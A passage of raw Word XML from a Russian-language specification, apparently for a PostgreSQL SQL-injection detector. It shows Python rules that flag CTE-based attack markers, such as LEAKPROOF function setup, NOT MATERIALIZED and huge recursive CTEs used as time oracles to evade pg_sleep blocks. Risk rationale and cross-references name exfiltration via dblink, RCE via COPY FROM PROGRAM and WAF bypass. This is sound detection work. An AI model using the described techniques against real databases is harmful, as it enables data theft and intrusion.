          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["cte_leaky_setup"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE15C87"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26A79AF5"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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F082D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D86A24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="CREATE FUNCTION с экстремально низкой COST (&lt;0.001) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CC078" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "или с флагом LEAKPROOF — pre-attack setup для leaky-views "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572089D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "exploitation. LEAKPROOF требует SUPERUSER.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1654090B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите CREATE FUNCTION; cost-overrides и LEAKPROOF "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBB6FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "должны устанавливаться DBA при установке расширений, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD74F56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "не в application-runtime.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B9120" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB4E44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38867825" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["cte_not_materialized"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBFD6F"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5BF64491"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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B16631" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAA0E69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="WITH ... AS NOT MATERIALIZED — явный inline-keyword. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF7BD37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "В application-коде редко легитимен (default-behavior "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E22D679" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "и так inline на PG 12+); explicit NOT MATERIALIZED — "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598AC496" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "часто маркер атаки на leaky-views (3.10.3).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA48629" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Уберите NOT MATERIALIZED keyword. Если требуется "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB9A4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "principled materialization-control — это редкая ad-hoc "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051B59C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "reporting-задача, не application-runtime.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05503762" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71696964" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD0368" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["cte_recursive_large_n"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78A424"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4B3DE08E"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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC7B82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687AEE7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Recursive CTE с N ≥ 10^6 или generate_series с N ≥ 10^7 — "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1BF718" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "паттерн time-based oracle без pg_sleep. Альтернатива из "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE32AB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "3.10.2 для обхода WAF-блокировок pg_sleep.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA5D88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-runtime recursive CTE редко с такими N; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19132D4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "проверьте источник параметра — если из user-input, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDEFC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                      "ограничьте на уровне валидации.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3F14C"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206CA1D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Градация risk обоснована:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0289758C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cte_dml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>. Data-modifying CTE через SELECT-эндпоинт — почти всегда атака. Легитимные DML-CTE в application-runtime редки и хорошо контролируются (fixed SQL templates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F376D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cte_leaky_setup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>. CREATE FUNCTION с экстремальной COST или LEAKPROOF — post-exploitation setup; в normal application нет use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE39F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cte_recursive_large_n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>. Большие N — индикатор time-based attack. Возможны false-positives на legitimate reporting (даты, batch-inserts), но контекстная редкость.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1F8AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cte_not_materialized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>. Сам keyword легитимен (performance hint в complex reporting), false-positive-rate выше, чем у других. Маркер только в комбинации с view-доступом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD8658" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">risk сопоставим с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (9-10) и выше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FILTER_BYPASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (6-8), потому что 3.10 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сама атака</w:t>
      </w:r>
      <w:r>
        <w:t>, а не транспорт (3.9) и не разведка (3.8). Финальное решение об инциденте — LLM-судья по совокупности маркеров.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377D016" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676A7F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Data-Modifying CTE: PostgreSQL Docs «WITH Queries — Data-Modifying Statements», основа 3.10.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116B5FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Docs (WITH Queries — Recursive, Materialization; Rules and Privileges — security_barrier; CREATE FUNCTION — LEAKPROOF, COST), PortSwigger SQLi cheat sheet, HackTricks PostgreSQL Injection, OWASP ReDoS (для 3.10.2 Payload C), Tom Lane / Andres Freund-context для leaky-views и CTE-inlining changes в PG 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F500C56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF63B3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 (Time-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.10.2 — альтернативные delay-примитивы. Без 3.10.2 в WAF-окружениях 3.4 не проходит, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокируется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4BD167" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главное противопоставление. 3.10.1 — single-command write, 3.5 — multi-command. 3.10.1 надёжнее на современных стэках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD3D74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.10.1-CTE + OOB-функция (dblink, postgres_fdw) в одной команде. CTE-обёртка ничего не добавляет к OOB-механике, но упаковывает write+exfil атомарно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B473C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.10.1 + COPY FROM PROGRAM не пересекаются (COPY не разрешён в CTE), но 3.10.1 → 3.7.2/3.7.3 через цепочку write-в-config + reload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E889632" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 (Metadata)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.10.2 — основной канал blind-разведки, когда HTTP-ответ не возвращает данные напрямую (3.8 разрабатывает payload-ы, 3.10.2 даёт oracle-примитив).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6EE5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (Filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.10.2 — обход WAF-блокировки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3.10.x в целом часто комбинируется с 3.9.6 (whitespace tricks) для маскировки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH</w:t>
      </w:r>
      <w:r>
        <w:t>-ключевого слова.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1422EC02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
